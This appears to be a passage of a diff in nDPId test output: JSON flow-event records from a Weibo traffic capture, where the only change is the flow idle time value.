-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":106,"flow_first_seen":1463089072445,"flow_last_seen":1463089073885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4308,"flow_tot_l4_payload_len":69723,"flow_avg_l4_payload_len":657,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35803,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} 
-00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1463089072445,"flow_last_seen":1463089073773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2872,"flow_tot_l4_payload_len":49381,"flow_avg_l4_payload_len":685,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1463089072445,"flow_last_seen":1463089073819,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":20463,"flow_avg_l4_payload_len":499,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35805,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} 
-00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1463089073319,"flow_last_seen":1463089073551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":3815,"flow_avg_l4_payload_len":293,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1463089073321,"flow_last_seen":1463089073852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":32930,"flow_avg_l4_payload_len":621,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35807,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089073322,"flow_last_seen":1463089073383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35808,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089073322,"flow_last_seen":1463089073383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35808,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1463089073334,"flow_last_seen":1463089073893,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":20023,"flow_avg_l4_payload_len":572,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35809,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1463089073424,"flow_last_seen":1463089073885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":398,"flow_tot_l4_payload_len":398,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35811,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071994,"flow_last_seen":1463089072138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"54.225.163.210","src_port":40440,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071994,"flow_last_seen":1463089072138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"54.225.163.210","src_port":40440,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089069330,"flow_last_seen":1463089069374,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.78","src_port":58480,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
-00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089069330,"flow_last_seen":1463089069374,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.78","src_port":58480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089070086,"flow_last_seen":1463089070131,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.78","src_port":58481,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089070086,"flow_last_seen":1463089070131,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.78","src_port":58481,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073479,"flow_last_seen":1463089073635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50827,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00633{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089073537,"flow_last_seen":1463089073759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50831,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089073537,"flow_last_seen":1463089073759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50831,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073764,"flow_last_seen":1463089073764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47721,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073764,"flow_last_seen":1463089073764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47721,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073789,"flow_last_seen":1463089073789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47723,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073789,"flow_last_seen":1463089073789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47723,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071730,"flow_last_seen":1463089071755,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.69","src_port":37802,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071730,"flow_last_seen":1463089071755,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.69","src_port":37802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":106,"flow_first_seen":1463089072445,"flow_last_seen":1463089073885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4308,"flow_tot_l4_payload_len":69723,"flow_avg_l4_payload_len":657,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35803,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1463089072445,"flow_last_seen":1463089073773,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2872,"flow_tot_l4_payload_len":49381,"flow_avg_l4_payload_len":685,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} 
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1463089072445,"flow_last_seen":1463089073819,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":20463,"flow_avg_l4_payload_len":499,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35805,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1463089073319,"flow_last_seen":1463089073551,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":3815,"flow_avg_l4_payload_len":293,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} 
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1463089073321,"flow_last_seen":1463089073852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":32930,"flow_avg_l4_payload_len":621,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35807,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089073322,"flow_last_seen":1463089073383,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35808,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089073322,"flow_last_seen":1463089073383,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35808,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1463089073334,"flow_last_seen":1463089073893,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":20023,"flow_avg_l4_payload_len":572,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35809,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1463089073424,"flow_last_seen":1463089073885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":398,"flow_tot_l4_payload_len":398,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35811,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071994,"flow_last_seen":1463089072138,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"54.225.163.210","src_port":40440,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071994,"flow_last_seen":1463089072138,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"54.225.163.210","src_port":40440,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089069330,"flow_last_seen":1463089069374,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.78","src_port":58480,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089069330,"flow_last_seen":1463089069374,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.78","src_port":58480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089070086,"flow_last_seen":1463089070131,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.78","src_port":58481,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089070086,"flow_last_seen":1463089070131,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.78","src_port":58481,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073479,"flow_last_seen":1463089073635,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50827,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00633{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089073537,"flow_last_seen":1463089073759,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50831,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089073537,"flow_last_seen":1463089073759,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50831,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073764,"flow_last_seen":1463089073764,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47721,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
